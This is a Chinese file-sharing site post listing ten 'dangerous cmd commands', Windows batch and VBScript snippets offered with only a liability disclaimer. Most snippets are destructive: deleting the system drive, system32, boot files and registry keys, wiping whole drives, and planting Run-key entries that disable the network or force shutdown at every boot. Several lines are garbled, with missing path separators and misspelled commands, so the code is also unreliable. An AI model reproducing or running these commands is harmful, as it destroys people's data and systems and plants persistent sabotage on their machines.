• 资源总数:14258个
  • 评论总数:1795次
  • 本月更新:1311个
  • 访问总数:10246664次
笑哥
  • 站长:笑哥
  • 89573952
    • 打造专业的干货基地
    • 分享实用的软件技术
    • 资源总数:14258个
    • 评论总数:1795次
    • 本月更新:1311个
    • 访问总数:10246664次

    当前位置:笑哥共享网 > 网络资源

    十大危险的cmd指令

    笑哥2019-12-11笑哥共享网
    注意:如果您使用了任何一个cmd指令,造成的所有损失与文章作者和笑哥共享网没有任何关系。
    请谨慎操作。请谨慎操作。请谨慎操作。


    1.死亡蓝屏
    @echo off
    del %systemdrive%\*.*/f/s/q
    shutdown -r -f -t 00

    2.更改文件后缀名
    REN *.DOC *.TXT REN *.JPEG *.TXT
    REN *.LNK *.TXT
    REN *.AVI *.TXT
    REN *.MPEG *.TXT
    REN *.COM *.TXT
    BEN *.BAT *.TXT

    3.删除系统重要文件
    del c:\WINDOWS\system32\*.*/q

    4.使pc永久崩溃
    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini

    5.删除全部注册表
    @ECHO OFF
    START reg delete HKCR/.exe
    START reg delete HKCR/.dll
    START reg delete HKCR/*

    6.永远禁用网络!
    echo @echo off>c:windowswimn32.bat
    echo break off>>c:windowswimn32.bat
    echo ipconfig/release_all>>c:windowswimn32.bat
    echo end>>c"windowswimn32.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun/v
    windowsapi/t reg_sz/d c:windowswimn32.bat/f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun/v
    controlexit/t reg_sz/d c:windowswimn32.bat/f
    pause

    7.永远的《回车》
    set wshshell =wscript.createobject<"wscript.shell">
    do
    wscript.sleep 100
    wshshell.sendkeys"~<enter>"
    loop

    8.开机就关机
    echo @echo off>c:windowshartlell.bat
    echo break off>>c:windowshartlell.bat
    echo shutdown -r -t 11-f>>c:windowshartlell.bat
    echo end>>c:windowshartlell.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun
    /v startapi /t reg_sz/d c:windowshartlell.bat /f
    reg add hkey-current_usersoftwaremicrosoftwindowscurrentversionrun
    /v/t reg_sz/d c:windowshartlell.bat /f
    PAUSE

    9.格式化硬盘
    rd/s/q D:\
    rd/s/q C:\
    rd/s/q E:\
    rd/s/q F:\
    rd/s/q g:\

    10.开启CD蜂鸣器 不停地响
    Set oWMP=CreateObject("WMPIayer.0CX.7")
    Set colCDROMs=oWMP.cdromCollection
    do
    if colCDROMs.Count>=1 then
    For i=0 to colCDROMs.Count -1
    colCDROMs.ltem<i>.Eject
    Next
    For =0 to colCDROMs.Count -1
    colCDROMs.ltem<i>.Eject
    Next
    End lf
    wscript.sleep 100
    Loop




    注意:如果您使用了任何一个cmd指令,造成的所有损失与文章作者和
    笑哥共享网没有任何关系。
    请谨慎操作。请谨慎操作。请谨慎操作。

    本站所有工具纯属免费共享,请学会感恩作者,无脑喷子永封IP段+删帐号所有评论 不喜欢请右上角X

    快快发表了一针见血的评论,你还等什么?
    用户名:
    验证码:点击我更换图片
    微信关注笑哥返利机器人
    微信号:blm737669552

    把宝贝分享给我(即宝贝链接),我会自动帮你找优惠券和返利的,领券购物立省钱!

    扫码加不上的加微信号blm737669552查看详情